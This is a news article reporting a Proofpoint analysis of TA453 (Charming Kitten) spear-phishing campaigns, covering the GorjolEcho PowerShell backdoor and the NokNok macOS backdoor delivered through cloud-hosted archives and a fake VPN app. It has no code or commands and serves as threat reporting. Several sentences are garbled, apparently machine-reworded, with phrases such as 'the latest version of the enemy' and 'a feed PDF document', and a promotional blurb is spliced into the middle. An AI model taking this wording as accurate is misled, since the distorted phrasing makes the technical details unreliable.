The Iranian nation-state actor known as TA453 has been linked to a series of new spear-phishing attacks that infected Windows and macOS operating systems with malware.
“TA453 ended up using multiple cloud hosting providers to deliver a new infection chain implementing the newly identified GorjolEcho PowerShell backdoor,” Proofpoint said in a new report.
“When given the chance, TA453 ported its malware and attempted to launch an Apple-flavored infection chain dubbed NokNok. TA453 also employs multi-person impersonation in its endless quest for espionage.”
TA453, also known as APT35, Charming Kitten, Mint Sandstorm, and Yellow Garuda, is a threat group associated with Iran’s Islamic Revolutionary Guard Corps (IRGC) that has been active since at least 2011. More recently, Volexity highlighted the use of the latest version of the enemy. from a Powershell implant called CharmPower (aka GhostEcho or POWERSTAR).
In an attack sequence uncovered by an enterprise security firm in mid-May 2023, a crew of hackers sends a phishing email to a nuclear security expert at a US-based think tank focused on foreign affairs that sends a malicious link to a Google Script macro that redirects the target. to the Dropbox URL hosting the RAR archive.
Present within the file is a LNK dropper that initiates a multi-stage procedure to finally deploy GorjolEcho, which, in turn, displays a feed PDF document, while silently waiting for the next stage’s load from the remote server.
But after realizing that the target was using an Apple computer, TA453 is said to have tweaked its modus operandi to send a second email with a ZIP archive embedding a Mach-O binary that masquerades as a VPN app, but is, in fact, an AppleScript that reaches a remote server to download a backdoor. based on a Bash script called NokNok.
🔐 Privileged Access Management: Learn How to Beat Key Challenges
Discover different approaches to conquering Privileged Account Management (PAM) challenges and enhance your privileged access security strategy.
NokNok, for its part, takes as many as four modules capable of collecting running processes, installed applications, and system metadata and managing persistence using LaunchAgents.
The module “reflects most of the functionality” of the modules associated with CharmPower, with NokNok sharing some overlapping source code with macOS malware previously linked to the group in 2017.
Also exploited by actors are fake file-sharing websites that likely function to fingerprint visitors and act as a mechanism to track successful victims.
“TA453 continues to adapt its malware arsenal, deploy new file types, and target new operating systems,” the researchers said, adding the actor “continues to work toward the same end goal of intrusive and unauthorized reconnaissance” while complicating detection efforts.